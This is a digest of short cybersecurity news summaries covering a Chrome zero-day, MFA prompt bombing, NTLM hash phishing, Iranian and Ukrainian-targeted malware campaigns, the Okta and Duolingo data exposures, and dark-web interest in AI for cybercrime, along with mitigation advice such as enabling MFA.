A zero-day vulnerability in Google Chrome (CVE-2025-2783) exploited by the Mem3nt0 mori hacker group has led to widespread infections using sophisticated spyware like LeetAgent, targeting high-profile entities in Russia and Belarus through targeted phishing campaigns. Google patched the flaw quickly, but the attacks highlight ongoing risks from advanced persistent threats and shadowy spyware markets. Users are advised to update Chrome and monitor for suspicious activity.
Attackers are targeting iPhone users with "MFA fatigue" attacks, bombarding devices with endless password reset prompts and even spoofed calls from "Apple support." This technique, also known as MFA prompt bombing, aims to overwhelm users with multifactor authentication requests, making it difficult to distinguish legitimate prompts from fake ones. Apple's password-reset scheme is vulnerable to these attacks, and experts recommend implementing rate limiting and FIDO-compliant MFA to mitigate the risk. Users are advised to be cautious of unsolicited calls and report suspicious activity to authorities.
The hacking group TA577 has shifted to using phishing emails to steal NTLM authentication hashes, targeting employees in organizations worldwide. These hashes can be used for offline password cracking or "pass-the-hash" attacks, potentially enabling attackers to escalate privileges, hijack accounts, access sensitive information, and move laterally within a breached network. The phishing emails contain unique ZIP archives with HTML files that trigger automatic connections to steal the NTLM hashes. Security measures such as multi-factor authentication, firewall configurations, email filtering, and Windows 11 security features can help mitigate these attacks.
Iranian threat actor Charming Kitten, also known as APT35, has targeted Middle East policy experts with a new backdoor called BASICSTAR, using fake webinar portals and social engineering tactics. The group, linked to Iran's Islamic Revolutionary Guard Corps (IRGC), has a history of deploying various backdoors and malware, including targeting high-profile individuals working on Middle Eastern affairs. The phishing attacks involved posing as legitimate organizations and using compromised email accounts, with the attackers showing a commitment to conducting surveillance on their targets. Additionally, Recorded Future uncovered IRGC's targeting of Western countries using a network of contracting companies specializing in surveillance and offensive technologies.
The threat actor UAC-0099 has been targeting Ukrainian firms using a high-severity vulnerability in WinRAR to distribute the LONEPAGE malware. The attacks involve phishing messages with HTA, RAR, and LNK file attachments, leading to the deployment of LONEPAGE, a VBS malware capable of retrieving additional payloads. UAC-0099 has gained unauthorized remote access to several dozen computers in Ukraine. The group also utilizes self-extracting archives and ZIP files to exploit the WinRAR vulnerability. The attacks rely on PowerShell and the creation of a scheduled task to execute a VBS file. Additionally, CERT-UA has warned of a new wave of phishing messages attributed to UAC-0050, spreading the Remcos RAT.
Okta, a major identity and authentication company, has revised its impact statement regarding a recent breach in its customer support department. Initially, Okta stated that sensitive data was stolen from less than 1% of its customers, but now they admit that the attackers also stole the names and email addresses of nearly all customer support users. While the majority of users had only their full name and email address exposed, about 3% had additional data fields compromised. Okta warns that many of the affected accounts belong to Okta administrators and advises them to enable multi-factor authentication (MFA) to protect against targeted phishing attacks. The breach was attributed to an employee who saved credentials for a service account in Okta's customer support infrastructure to their personal Google account, which was likely compromised.
Cybersecurity expert and former government hacker Kyle Hanslovan emphasizes the importance of multi-factor authentication as the "single biggest thing you can do" to protect against scams and deter hackers. Despite its effectiveness, many people dislike the inconvenience of the extra step during the login process. Hanslovan recommends using an authenticator app instead of text message or email-based authentication options for added security. Small businesses, in particular, are vulnerable to cyberattacks due to their lack of preparedness. Implementing multi-factor authentication can significantly raise the bar for hackers and make them move on to easier targets.
The scraped data of 2.6 million Duolingo users, including email addresses and internal information, has been leaked on a hacking forum, potentially enabling targeted phishing attacks. The data was obtained through an exposed API that allowed anyone to retrieve user profile information, including email addresses. While Duolingo confirmed that the data was scraped from public profiles, they did not address the inclusion of non-public information. Companies often dismiss scraped data as not a concern, but the mixture of public and private data increases the risk and potential violation of data protection laws.
The dark web is showing significant interest in the AI revolution, with threat actors discussing the potential uses of language models for cybercrime activities such as identifying 0-day exploits and crafting spear-phishing emails. Open source AI models, in particular, are attractive to threat actors as they have not undergone reinforcement learning to prevent risky or illegal answers. Threat exposure management firm Flare has identified over 200,000 OpenAI credentials being sold on the dark web. The commodification of cybercrime and the increasing capabilities of AI language models are colliding, leading to concerns about the potential misuse of these models for cybercriminal activities.
